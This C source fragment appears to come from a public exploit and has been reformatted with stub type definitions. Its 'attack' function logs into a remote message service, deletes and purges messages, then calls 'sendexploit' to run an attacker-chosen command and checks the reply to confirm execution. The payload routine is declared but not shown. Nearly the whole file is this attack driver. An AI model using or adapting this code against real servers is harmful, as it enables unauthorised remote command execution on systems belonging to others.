
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;
typedef int buffer ;



 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;






 int delmessage (int) ;
 int fprintf (int ,char*) ;
 int memset (char*,int ,int) ;
 int printf (char*,...) ;
 int purgemessage (int) ;
 int read (int,char*,int) ;
 int readmessage (int) ;
 int select (int,int *,int *,int *,int *) ;
 int sendexploit (int,char*,int,char*) ;
 int sendlogin (int,char*) ;
 int sendpassword (int,char*) ;
 int sleep (int) ;
 int sscanf (char*,char*,int*) ;
 int stderr ;
 int strstr (char*,char*) ;

int attack(int s, char *user, char *password, int idx, char *exec) {
fd_set fs;
int selret, state, len, code;
char buffer[2048] = "";

FD_ZERO(&fs);
FD_SET(s, &fs);

state = 128;

do {
selret = select(s + 1, &fs, ((void*)0), ((void*)0), ((void*)0));
if (selret > 0 && FD_ISSET(s, &fs)) {
memset(buffer, 0, sizeof(buffer));
len = read(s, buffer, sizeof(buffer));
printf("<<< %s\n", buffer);
sscanf(buffer, "%d", &code);
switch(state) {
case 128: sendlogin(s, user);
state = 129;
break;
case 129: sendpassword(s, password);
state = 134;
break;
case 134: delmessage(s);
state = 133;
break;
case 133: purgemessage(s);
state = 130;
break;
case 130: if (code > 500) {
fprintf(stderr, "[*] login failed\n");
len = -1;
} else if (code == 230) {
fprintf(stderr, "[*] sending exploit code ...\n");
sendexploit(s, user, idx, exec);
state = 131;
}
break;
case 131: sleep(5);
readmessage(s);
state = 132;
break;
case 132: if (code == 200 && strstr(buffer, "00000") && strstr(buffer, exec)) {
printf("[*] done\n");
}
break;
}
}
} while (len > 0);
}
